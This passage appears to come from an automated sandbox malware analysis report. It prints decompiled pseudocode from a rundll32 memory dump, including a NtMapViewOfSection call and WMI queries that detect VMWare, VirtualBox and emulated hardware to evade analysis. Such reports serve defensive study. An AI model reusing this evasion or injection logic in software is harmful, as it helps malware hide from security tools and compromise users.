				r12d =  *(_t327 + 0xd0);
				r14d = __r8 - 0x1569;
				r8d =  *(_t327 + 0xf0);
				_t4 = _t304 - 0x54f; // -552
				r11d = _t4;
				 *(_t327 + 0xe0) =  *(_t327 + 0xe0) + 0x2bc;
				_t9 = _t304 + 0x54a; // 0x871
				r10d = _t9;
				_t326 =  *((intOrPtr*)(_t327 + 0xe8));
				_t11 = _t304 - 0x15fd; // -4822
				 *(_t327 + 0x50) = r11d;
				 *(_t327 + 0xf0) = _t196;
				r13d = __rcx + 0x379;
				_t197 = __rcx - 0x6c0;
				 *(_t327 + 0xd0) = r14d;
				r12d = r12d + 0xffffff29;
				 *(_t327 + 0xb0) = _t197;
				 *(_t327 + 0xc8) = r10d;
				r9d = r9d + 0xffffedd2;
				 *(_t327 + 0xc0) = _t197;
				_t318 =  *(_t327 + 0xd8) + 0xfffffc27;
				 *(_t327 + 0xd8) = r9d;
				_t159 = _t340 + 0xb13;
				r15d = __r8 - 0x1486;
				if (r11d - _t159 > 0) goto 0x535f6ad9;
				 *((long long*)(_t326 + 0x430)) =  *((intOrPtr*)(_t326 + 0x150));
				r15d = r15d + 0xa5d;
				 *((long long*)( *(_t326 + 0x108) + 0x338)) = 0x262b;
				r14d = r14d + 0x1b47;
				 *( *(_t326 + 0x160) + 0x1a8) =  *( *((intOrPtr*)(_t326 + 0x2a0)) + 0x3b8) ^ 0x00001569;
				r8d =  *(_t327 + 0xe0);
				_t202 = _t318 + 0xaf9;
				if (r11d - _t159 > 0) goto 0x535f6e7c;
				if (r11d == _t340 + 0x1305) goto 0x535f69f7;
				r14d = r14d - 0x89a;
				r13d = r13d - 0x319;
				if (r12d - _t341 - 0x887 >= 0) goto 0x535f6d8f;
				r10d =  *(_t327 + 0xf0);
				r11d = __r9 + 0x68e;
				r10d = r10d + 0xfffff9db;
				r9d = r9d + 0xf15;
				 *(_t327 + 0x38) = _t202;
				 *(_t327 + 0x30) = __rdx;
				r8d = r8d + 0x94;
				 *(_t327 + 0x28) = r10d;
				 *(_t327 + 0x20) = r11d;
				_t163 = E00007FFA7FFA535F7A40(_t11 + 0x12ad, _t324 + 0x157a, _t326, __r8, __r9, _t339); // executed
				_t263 = _t318 + 0x467;
				_t325 = _t324 + 0x1582;
				r10d = _t341 - 0x4d9;
				 *(_t327 + 0x48) = r10d;
				r11d = _t342 + 0x2bc;
				 *(_t327 + 0x40) = r11d;
				r9d = _t340 + 0x9c7;
				 *(_t327 + 0x38) = r13d;
				r8d = _t342 - 0xbc;
				 *(_t327 + 0x30) = _t263;
				 *(_t327 + 0x28) =  *(_t327 + 0xd8) + 0x1348;
				r15d = _t163;
				 *(_t327 + 0x20) = _t325;
				E00007FFA7FFA535F9C34(); // executed
				 *_t202 =  *_t202 + _t163;
				 *0x48000003 = _t202;
				 *_t202 =  *_t202 + _t163;
				r8d = _t177;
				goto 0x535f6b2e;
				if ( *(_t326 + 0x110) - 0x11f1 <= 0) goto 0x535f6b27;
				 *(_t326 + 0x240) =  *(_t326 + 0x240) * (r12d | 0x00001582);
				r8d = r8d + 3;
				if (r8d - (0x00000bbb | r14d) > 0) goto 0x535f6aee;
				_t210 =  *((intOrPtr*)(_t326 + 0xa8));
				 *((long long*)(_t327 + 0xb8)) = _t210;
				if (_t210 -  *(_t327 + 0xf0) *  *(_t326 + 0x140) <= 0) goto 0x535f69c5;
				 *(_t327 + 0x58) =  *(_t327 + 0xb0) ^ r14d;
				r8d =  *(_t326 + 0x138);
				r8d = r8d + 0x1320;
				r12d = r12d * r12d;
				 *(_t326 + 0x320) =  *(_t326 + 0x320) * ( *(_t326 + 0x3d0) -  *((intOrPtr*)(_t326 + 0x5e0)) -  *(_t326 + 0x110));
				EnterCriticalSection(??);
				 *(_t326 + 0x158) =  *(_t326 + 0x158) - ( *(_t326 + 0x178) ^  *(_t327 + 0xc0));
				 *(_t327 + 0xe0) =  *(_t327 + 0xe0) - ( *(_t326 + 0x238) ^  *(_t327 + 0xd8) ^ 0x00001487);
				r11d =  *(_t326 + 0x128);
				r11d = r11d * _t177;
				r11d = r11d & r14d;
				 *(_t327 + 0x28) = r13d;
				 *(_t327 + 0x20) = r11d;
				_t169 = GetLastError();
				r8d =  *(_t327 + 0xe0);
				r9d =  *(_t327 + 0xd8);
				_t171 = _t169 * r9d * r15d;
				r8d = r8d + _t171;
				 *(_t327 + 0xe0) = r8d;
				 *(_t326 + 0x3d0) =  *(_t326 + 0x3d0) *  *(_t327 + 0x58);
				 *(_t327 + 0xd0) =  *(_t327 + 0xd0) ^  *((intOrPtr*)(_t326 + 0x38)) + 0xffffee0f + _t325;
				 *(_t326 + 0x160) =  *(_t326 + 0x160) | ( *(_t326 + 0x110) & r14d) -  *((intOrPtr*)(_t326 + 0x70));
				 *(_t326 + 0x410) =  *(_t326 + 0x410) * ( *(_t326 + 0x158) |  *(_t326 + 0x108));
				_t315 = _t171;
				 *(_t327 + 0xf0) =  *(_t326 + 0x1d0) | 0x00000651;
				 *(_t326 + 0x5d0) =  *(_t326 + 0x5d0) + ( *((intOrPtr*)(_t326 + 0x2e0)) + _t315 | 0x0000157a);
				_t239 =  *((intOrPtr*)(_t327 + 0xb8)) + 1;
				 *((long long*)(_t327 + 0xb8)) = _t239;
				if (_t239 -  *(_t326 + 0x140) * _t315 > 0) goto 0x535f6b74;
				r10d =  *(_t327 + 0xc8);
				r11d =  *(_t327 + 0x50);
				goto 0x535f69cd;
				_t295 = _t177;
				if (_t295 -  *(_t326 + 0x3d0) +  *((intOrPtr*)(_t326 + 0x168)) > 0) goto 0x535f6e7c;
				if (_t295 - ( *(_t326 + 0x2a8) + 0x00001ad7 ^  *(_t326 + 8)) >= 0) goto 0x535f6e7c;
				_t331 =  *(_t326 + 0x110);
				 *((intOrPtr*)(_t326 + 0x58)) =  *((intOrPtr*)(_t326 + 0x58)) + r10d -  *((intOrPtr*)(_t326 + 0x230));
				_t250 = ( *(_t326 + 0x5d0) *  *(_t326 + 0x2a8) + 0x1582) * _t263;
				 *(_t326 + 0x318) =  *(_t326 + 0x318) ^ _t250 * _t331;
				 *((intOrPtr*)(_t326 + 0x300)) =  *((intOrPtr*)(_t326 + 0x300)) + _t250;
				_t175 = r15d | r13d;
				r10d = r10d - _t175;
				 *(_t326 + 0x110) =  *(_t326 + 0x320) + 0xfffffab6 + _t331;
				 *((long long*)(_t326 + 0x418)) =  *((intOrPtr*)(_t326 + 0x198)) + 0x10ae;
				r15d = r15d ^ _t175;
				 *(_t326 + 0x1d0) =  *(_t326 + 0x1d0) |  *(_t326 + 0x340) ^ 0x0000157a |  *(_t326 + 0x298) | r10d;
				return _t343 - 0x650;
			}






























                0x7ffa535f6898
                0x7ffa535f68a9
                0x7ffa535f68b1
                0x7ffa535f68b8
                0x7ffa535f68c0
                0x7ffa535f68c0
                0x7ffa535f68d5
                0x7ffa535f68e0
                0x7ffa535f68e0
                0x7ffa535f68e7
                0x7ffa535f68ef
                0x7ffa535f68fc
                0x7ffa535f6901
                0x7ffa535f6908
                0x7ffa535f690f
                0x7ffa535f6915
                0x7ffa535f691d
                0x7ffa535f6924
                0x7ffa535f6932
                0x7ffa535f693a
                0x7ffa535f6941
                0x7ffa535f6948
                0x7ffa535f694e
                0x7ffa535f6956
                0x7ffa535f695e
                0x7ffa535f6968
                0x7ffa535f697b
                0x7ffa535f6982
                0x7ffa535f6990
                0x7ffa535f69b7
                0x7ffa535f69be
                0x7ffa535f69c5
                0x7ffa535f69cd
                0x7ffa535f69d6
                0x7ffa535f69e7
                0x7ffa535f69e9
                0x7ffa535f69f0
                0x7ffa535f6a01
                0x7ffa535f6a07
                0x7ffa535f6a16
                0x7ffa535f6a1d
                0x7ffa535f6a2b
                0x7ffa535f6a32
                0x7ffa535f6a3c
                0x7ffa535f6a40
                0x7ffa535f6a47
                0x7ffa535f6a4f
                0x7ffa535f6a54
                0x7ffa535f6a59
                0x7ffa535f6a5f
                0x7ffa535f6a6c
                0x7ffa535f6a73
                0x7ffa535f6a78
                0x7ffa535f6a7f
                0x7ffa535f6a84
                0x7ffa535f6a8c
                0x7ffa535f6a91
                0x7ffa535f6a98
                0x7ffa535f6aac
                0x7ffa535f6ab0
                0x7ffa535f6ab3
                0x7ffa535f6ab7
                0x7ffa535f6ac5
                0x7ffa535f6ad5
                0x7ffa535f6ade
                0x7ffa535f6ae0
                0x7ffa535f6aec
                0x7ffa535f6af9
                0x7ffa535f6b20
                0x7ffa535f6b27
                0x7ffa535f6b31
                0x7ffa535f6b33
                0x7ffa535f6b4a
                0x7ffa535f6b54
                0x7ffa535f6b6f
                0x7ffa535f6b90
                0x7ffa535f6ba1
                0x7ffa535f6ba8
                0x7ffa535f6bc3
                0x7ffa535f6bd0
                0x7ffa535f6bef
                0x7ffa535f6c0e
                0x7ffa535f6c1f
                0x7ffa535f6c3a
                0x7ffa535f6c4f
                0x7ffa535f6c74
                0x7ffa535f6c83
                0x7ffa535f6c88
                0x7ffa535f6c9b
                0x7ffa535f6ca6
                0x7ffa535f6cc1
                0x7ffa535f6cd1
                0x7ffa535f6ce4
                0x7ffa535f6cec
                0x7ffa535f6cf9
                0x7ffa535f6d04
                0x7ffa535f6d24
                0x7ffa535f6d36
                0x7ffa535f6d39
                0x7ffa535f6d50
                0x7ffa535f6d65
                0x7ffa535f6d6b
                0x7ffa535f6d77
                0x7ffa535f6d7d
                0x7ffa535f6d85
                0x7ffa535f6d8a
                0x7ffa535f6d9d
                0x7ffa535f6da3
                0x7ffa535f6dbd
                0x7ffa535f6dc3
                0x7ffa535f6dda
                0x7ffa535f6dec
                0x7ffa535f6df5
                0x7ffa535f6e08
                0x7ffa535f6e0f
                0x7ffa535f6e21
                0x7ffa535f6e3b
                0x7ffa535f6e49
                0x7ffa535f6e6c
                0x7ffa535f6e75
                0x7ffa535f6e93

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalEnterErrorLastSection
                • String ID:
                • API String ID: 3668107397-0
                • Opcode ID: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction ID: bbce37362446a5f7e6105aa051ec284556b92b8b0cbafd4f6406950cbdf6777d
                • Opcode Fuzzy Hash: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction Fuzzy Hash: EAE14773614AC58ED734CF24E8817EA77A9F788748F005126DB4E9BB98DB78E654CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F5694 Relevance: 1.7, APIs: 1, Instructions: 158nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E00007FFA7FFA535F5694(void* __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
				void* _t111;
				void* _t118;
				signed int _t120;
				void* _t124;
				intOrPtr _t129;
				signed long long _t141;
				long long _t150;
				signed int _t153;
				intOrPtr _t154;
				signed int _t179;
				long _t188;
				signed long long _t189;
				signed long long _t193;
				long long _t197;
				signed long long _t198;
				void* _t201;
				void* _t202;
				void* _t206;
				void* _t207;
				long _t209;
				PVOID* _t211;
				void* _t213;
				void* _t215;

				 *((long long*)(_t201 + 8)) = __rbx;
				 *((long long*)(_t201 + 0x10)) = _t197;
				 *((long long*)(_t201 + 0x18)) = __rsi;
				_t202 = _t201 - 0x50;
				_t179 =  *(_t202 + 0xb0);
				r14d = __rcx - 0x10ae;
				_t129 =  *((intOrPtr*)(_t202 + 0xb8));
				r8d =  *(_t202 + 0xa8);
				r12d =  *(_t202 + 0xd0);
				r8d = r8d + 0xfffff652;
				r12d = r12d + 0xfffff36e;
				_t198 = _t179 + 0x572;
				r13d = _t129 - 0x1487;
				_t189 = _t198;
				_t193 = _t179 - 0x12ad;
				 *(_t202 + 0xb0) = _t129 + 0xf3;
				r15d =  *((intOrPtr*)(_t202 + 0xc8)) - 0x379;
				if (r8d - _t111 >= 0) goto 0x535f58d1;
				r11d = _t213 + 0x11f1;
				 *((intOrPtr*)(_t202 + 0x40)) = r11d;
				 *(_t202 + 0x38) = __rbx;
				r10d = _t198 - 0x2a5;
				_t153 =  *((intOrPtr*)(_t202 + 0xc0));
				r9d = _t209 + 0x157a;
				 *(_t202 + 0x30) =  *((intOrPtr*)(_t202 + 0xa0)) + 0xc64;
				r8d = _t215 + 0x22d;
				 *(_t202 + 0x28) = _t179;
				 *(_t202 + 0x20) = r10d;
				E00007FFA7FFA535F615C( *((intOrPtr*)(_t202 + 0xa0)) + 0xc64, _t153, _t198 + 0x328, _t153, __r8, _t206); // executed
				 *((long long*)(_t153 + 0xe8)) = 0;
				 *((long long*)(_t153 + 0x3f8)) = _t153 + 0x348;
				r9d = 0;
				 *( *((intOrPtr*)(_t153 + 0x108)) + 0x198) =  *( *((intOrPtr*)(_t153 + 0x108)) + 0x198) * ( *((intOrPtr*)(_t153 + 0x2a0)) + 0x3b8);
				 *( *((intOrPtr*)(_t153 + 0x108)) + 0x128) =  *( *((intOrPtr*)(_t153 + 0x108)) + 0x128) ^  *((intOrPtr*)(_t153 + 0x240)) + 0x000002e8;
				_t141 =  *((intOrPtr*)(_t153 + 0x628));
				 *(_t202 + 0x48) =  *( *((intOrPtr*)(_t153 + 0x160)) + 0x70) ^ 0x000014c7;
				 *((long long*)(_t202 + 0x40)) = 0;
				 *(_t202 + 0x38) = 1;
				 *(_t202 + 0x30) = _t141;
				 *(_t202 + 0x28) = 0;
				 *(_t202 + 0x20) = 0;
				NtMapViewOfSection(_t215, _t213, _t211, _t209, _t188);
				 *(_t153 + 0x404) = _t141;
				if (_t141 == 0) goto 0x535f588c;
				 *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x298) =  *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x298) ^  *( *((intOrPtr*)(_t153 + 0x108)) + 0x398) * 0x00000651;
				 *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x420) =  *( *((intOrPtr*)(_t153 + 0x2a0)) + 0x420) * 0x8f1;
				goto 0x535f59c8;
				 *(_t202 + 0x38) = _t193 + 0x1582;
				r10d = _t189 - 0x3c3;
				 *(_t202 + 0x30) = r10d;
				r9d =  &(_t211[0x545]);
				 *(_t202 + 0x28) = _t153;
				r8d = _t193 + 0x1355;
				 *(_t202 + 0x20) = _t189;
				_t120 = _t215 - 0x6c3;
				E00007FFA7FFA535F65D4(_t124, _t193 + 0x1582, _t153,  *((intOrPtr*)(_t153 + 0x2a0)), _t193, _t153 + 0xe8, _t207);
				goto 0x535f59c2;
				_t154 =  *((intOrPtr*)(_t202 + 0xc0));
				r13d =  *(_t202 + 0xb0);
				 *(_t154 + 0x3c0) =  *(_t154 + 0x3c0) ^ _t120 ^ r13d;
				r10d =  *(_t154 + 0x420);
				r9d =  *(_t154 + 0x248);
				r9d = r9d ^ r13d;
				r8d =  *(_t154 + 0x168);
				r8d = r8d &  *(_t154 + 0x3c8);
				r10d = r10d * r15d;
				_t150 =  *((intOrPtr*)(_t154 + 0x230)) +  *(_t154 + 0x3c8);
				 *(_t154 + 0x448) =  *(_t154 + 0x448) ^ r14d * r8d *  *(_t154 + 0x4b8);
				 *((intOrPtr*)(_t154 + 0x130)) =  *((intOrPtr*)(_t154 + 0x130)) + _t150;
				 *((long long*)(_t202 + 0x40)) = _t150;
				r12d = r12d * r12d;
				 *(_t202 + 0x38) = r12d;
				 *(_t202 + 0x30) =  *(_t154 + 0x318) & 0x00001fda;
				 *(_t202 + 0x28) = r10d;
				 *(_t202 + 0x20) = _t193 & 0x000011f1 ^  *(_t154 + 0x320);
				_t118 = E00007FFA7FFA535F615C(_t150, _t154,  *(_t154 + 0x300) * 0x0000145c |  *(_t154 + 0x170), _t154, _t153 + 0xe8, _t206);
				 *(_t154 + 0x170) =  *(_t154 + 0x170) + _t120;
				r13d = r13d - (_t120 | r14d);
				 *((intOrPtr*)(_t154 + 0x310)) =  *((intOrPtr*)(_t154 + 0x310)) + r13d *  *(_t154 + 0x3a0);
				return _t118;
			}


























                0x7ffa535f5694
                0x7ffa535f5699
                0x7ffa535f569e
                0x7ffa535f56ac
                0x7ffa535f56b0
                0x7ffa535f56b7
                0x7ffa535f56be
                0x7ffa535f56c5
                0x7ffa535f56cd
                0x7ffa535f56d5
                0x7ffa535f56dc
                0x7ffa535f56e3
                0x7ffa535f56e9
                0x7ffa535f56f0
                0x7ffa535f56f7
                0x7ffa535f56fd
                0x7ffa535f5711
                0x7ffa535f5721
                0x7ffa535f5735
                0x7ffa535f5741
                0x7ffa535f574d
                0x7ffa535f5751
                0x7ffa535f5758
                0x7ffa535f5760
                0x7ffa535f5768
                0x7ffa535f576c
                0x7ffa535f5773
                0x7ffa535f5780
                0x7ffa535f5785
                0x7ffa535f5793
                0x7ffa535f579d
                0x7ffa535f57a4
                0x7ffa535f57c7
                0x7ffa535f57e6
                0x7ffa535f57f7
                0x7ffa535f5804
                0x7ffa535f580f
                0x7ffa535f5813
                0x7ffa535f581b
                0x7ffa535f5820
                0x7ffa535f5825
                0x7ffa535f582a
                0x7ffa535f5830
                0x7ffa535f5838
                0x7ffa535f5853
                0x7ffa535f586c
                0x7ffa535f5887
                0x7ffa535f5892
                0x7ffa535f5896
                0x7ffa535f589d
                0x7ffa535f58a2
                0x7ffa535f58a9
                0x7ffa535f58ae
                0x7ffa535f58bc
                0x7ffa535f58c0
                0x7ffa535f58c7
                0x7ffa535f58cc
                0x7ffa535f58d1
                0x7ffa535f58e5
                0x7ffa535f58f0
                0x7ffa535f5900
                0x7ffa535f590d
                0x7ffa535f591a
                0x7ffa535f5921
                0x7ffa535f5928
                0x7ffa535f592f
                0x7ffa535f5945
                0x7ffa535f594c
                0x7ffa535f5953
                0x7ffa535f5968
                0x7ffa535f596c
                0x7ffa535f5976
                0x7ffa535f597b
                0x7ffa535f5982
                0x7ffa535f5987
                0x7ffa535f598b
                0x7ffa535f59a1
                0x7ffa535f59ad
                0x7ffa535f59bb
                0x7ffa535f59e5

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Section$CreateView
                • String ID:
                • API String ID: 1585966358-0
                • Opcode ID: 27078456d6ec4aa6f734cb8f6f5f421d829cfd14c0dcfec4e5c627ca501a3fb4
                • Instruction ID: 128adba1762b03bf69f1ce167a6a7d349a38f1644cb1ba06fa342de9512fdaa7
                • Opcode Fuzzy Hash: 27078456d6ec4aa6f734cb8f6f5f421d829cfd14c0dcfec4e5c627ca501a3fb4
                • Instruction Fuzzy Hash: D0813877218B818AC754CF24E484BDA77A8F388B58F580236EF8E4B758DB38D655CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CE3A0 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 147memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1094 215205ce3a0-215205ce3c7 call 215205d0410 1097 215205ce3cd-215205ce403 SysAllocString * 2 1094->1097 1098 215205ce5ab-215205ce5b3 1094->1098 1099 215205ce45a-215205ce462 1097->1099 1100 215205ce405-215205ce408 1097->1100 1101 215205ce464-215205ce467 SysFreeString 1099->1101 1102 215205ce46d-215205ce475 1099->1102 1103 215205ce451-215205ce454 SysFreeString 1100->1103 1104 215205ce40a-215205ce426 1100->1104 1101->1102 1105 215205ce59d-215205ce5aa 1102->1105 1106 215205ce47b-215205ce48b 1102->1106 1103->1099 1109 215205ce430-215205ce432 1104->1109 1107 215205ce491-215205ce49f 1106->1107 1108 215205ce576-215205ce599 CoUninitialize 1106->1108 1110 215205ce4a0-215205ce4bf 1107->1110 1108->1105 1109->1103 1111 215205ce434-215205ce44b CoUninitialize 1109->1111 1116 215205ce572 1110->1116 1117 215205ce4c5-215205ce4e1 1110->1117 1111->1103 1116->1108 1120 215205ce4e7-215205ce4e9 1117->1120 1121 215205ce559-215205ce56a 1120->1121 1122 215205ce4eb-215205ce4f3 1120->1122 1121->1110 1127 215205ce570 1121->1127 1122->1121 1123 215205ce4f5-215205ce4f7 1122->1123 1125 215205ce54f-215205ce553 VariantClear 1123->1125 1126 215205ce4f9-215205ce50c call 215205f9740 1123->1126 1125->1121 1130 215205ce50e-215205ce521 call 215205f9740 1126->1130 1131 215205ce54d 1126->1131 1127->1108 1130->1131 1134 215205ce523-215205ce536 call 215205f9740 1130->1134 1131->1125 1134->1131 1137 215205ce538-215205ce54b call 215205f9740 1134->1137 1137->1125 1137->1131
                C-Code - Quality: 26%
                			E00000215215205CE3A0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				intOrPtr _v56;
				signed short _v64;
				void* _v72;
				long long _v80;
				long long _v88;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t98;
				intOrPtr* _t114;
				long long _t134;
				long long _t135;
				void* _t146;

				_t135 = __rsi;
				_a24 = _t134;
				_v72 = _t134;
				_a16 = _t134;
				_t54 = E00000215215205D0410(_t53,  &_a24,  &_v72, __rsi); // executed
				if (_t54 == 0) goto 0x205ce5ab;
				_v24 = __rbx;
				_v32 = _t135;
				_v40 = __r14;
				__imp__#2();
				__imp__#2();
				_t9 = _t134 + 1; // 0x1
				r14d = _t9;
				_t104 = __rax;
				if (__rax == 0) goto 0x205ce45a;
				if (__rax == 0) goto 0x205ce451;
				_v80 =  &_a16;
				_t13 = _t134 + 0x30; // 0x30
				r9d = _t13;
				_v88 = _t134;
				_t145 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x205ce451;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				_t137 = _v32;
				if (__rax == 0) goto 0x205ce46d;
				__imp__#6();
				if (r14d == 0) goto 0x205ce59d;
				_t114 = _a16;
				_a32 = _t134;
				_a8 = 0;
				if (_t114 == 0) goto 0x205ce576;
				asm("o16 nop [eax+eax]");
				_v88 =  &_a8;
				r8d = 1; // executed
				 *((intOrPtr*)( *_t114 + 0x20))();
				if (_a8 == 0) goto 0x205ce572;
				_v80 = _t134;
				r8d = 0;
				_v88 = _t134;
				_t98 =  *_a32; // executed
				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0x205ce559;
				_t60 = _v64 & 0x0000ffff;
				if (_t60 == 1) goto 0x205ce559;
				if ((_t60 & 0x00000008) == 0) goto 0x205ce54f;
				E00000215215205F9740(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
				if (_t98 != 0) goto 0x205ce54d;
				E00000215215205F9740(_t104, _v56, L"82441FX", _v32, _t145, _t146);
				if (_t98 != 0) goto 0x205ce54d;
				E00000215215205F9740(_t104, _v56, L"82371SB", _v32, _t145, _t146);
				if (_t98 != 0) goto 0x205ce54d;
				E00000215215205F9740(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
				if (_t98 == 0) goto 0x205ce54f;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0x205ce4a0;
				goto 0x205ce576;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize(); // executed
				dil = 1 - 3 >= 0;
				return 0;
			}



















                0x215205ce3a0
                0x215205ce3b4
                0x215205ce3b8
                0x215205ce3bc
                0x215205ce3c0
                0x215205ce3c7
                0x215205ce3cd
                0x215205ce3d9
                0x215205ce3de
                0x215205ce3e3
                0x215205ce3f3
                0x215205ce3f9
                0x215205ce3f9
                0x215205ce3fd
                0x215205ce403
                0x215205ce408
                0x215205ce412
                0x215205ce417
                0x215205ce417
                0x215205ce41e
                0x215205ce426
                0x215205ce432
                0x215205ce438
                0x215205ce43e
                0x215205ce448
                0x215205ce44b
                0x215205ce454
                0x215205ce45a
                0x215205ce462
                0x215205ce467
                0x215205ce475
                0x215205ce47b
                0x215205ce481
                0x215205ce485
                0x215205ce48b
                0x215205ce495
                0x215205ce4a7
                0x215205ce4b3
                0x215205ce4b9
                0x215205ce4bf
                0x215205ce4cd
                0x215205ce4d9
                0x215205ce4dc
                0x215205ce4e1
                0x215205ce4e9
                0x215205ce4eb
                0x215205ce4f3
                0x215205ce4f7
                0x215205ce504
                0x215205ce50c
                0x215205ce519
                0x215205ce521
                0x215205ce52e
                0x215205ce536
                0x215205ce543
                0x215205ce54b
                0x215205ce553
                0x215205ce560
                0x215205ce56a
                0x215205ce570
                0x215205ce579
                0x215205ce583
                0x215205ce58d
                0x215205ce590
                0x215205ce599
                0x215205ce5aa

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1414631806-1350769890
                • Opcode ID: 4ee1411a084c1c66a2b76c8730bf5cb7fccef8219e481e6b74e7e5a8e5dd8aaa
                • Instruction ID: a688fc6f0106ad10e6b25759c2303b872343da138426628acff7c1b13386caa1
                • Opcode Fuzzy Hash: 4ee1411a084c1c66a2b76c8730bf5cb7fccef8219e481e6b74e7e5a8e5dd8aaa
                • Instruction Fuzzy Hash: 81611737312E61C6EB219F25E8886DC67A4FBA8B98F540152EE4E47B68EF38D545C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CFA60 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 130memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1140 215205cfa60-215205cfa87 call 215205d0410 1143 215205cfc54-215205cfc5c 1140->1143 1144 215205cfa8d-215205cfac3 SysAllocString * 2 1140->1144 1145 215205cfb1a-215205cfb22 1144->1145 1146 215205cfac5-215205cfac8 1144->1146 1147 215205cfb24-215205cfb27 SysFreeString 1145->1147 1148 215205cfb2d-215205cfb3a 1145->1148 1149 215205cfb11-215205cfb14 SysFreeString 1146->1149 1150 215205cfaca-215205cfae6 1146->1150 1147->1148 1148->1143 1151 215205cfb40-215205cfb4e 1148->1151 1149->1145 1154 215205cfaf0-215205cfaf2 1150->1154 1152 215205cfb54-215205cfb58 1151->1152 1153 215205cfc30-215205cfc4e CoUninitialize 1151->1153 1156 215205cfb60-215205cfb7f 1152->1156 1153->1143 1154->1149 1155 215205cfaf4-215205cfb0b CoUninitialize 1154->1155 1155->1149 1156->1153 1161 215205cfb85-215205cfba1 1156->1161 1163 215205cfba7-215205cfba9 1161->1163 1165 215205cfbfe-215205cfc0f 1163->1165 1166 215205cfbab-215205cfbb0 1163->1166 1165->1156 1173 215205cfc15 1165->1173 1167 215205cfbb2-215205cfbc6 StrStrIW 1166->1167 1168 215205cfbf4-215205cfbf8 VariantClear 1166->1168 1169 215205cfbc8-215205cfbdc StrStrIW 1167->1169 1170 215205cfc17-215205cfc2b VariantClear 1167->1170 1168->1165 1169->1170 1172 215205cfbde-215205cfbf2 StrStrIW 1169->1172 1170->1153 1172->1168 1172->1170 1173->1153
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                • API String ID: 4173814494-4167877488
                • Opcode ID: 3774e90ebb1ffb59e462e348ed298952ad424a19e35e36385dbe4d8072061f51
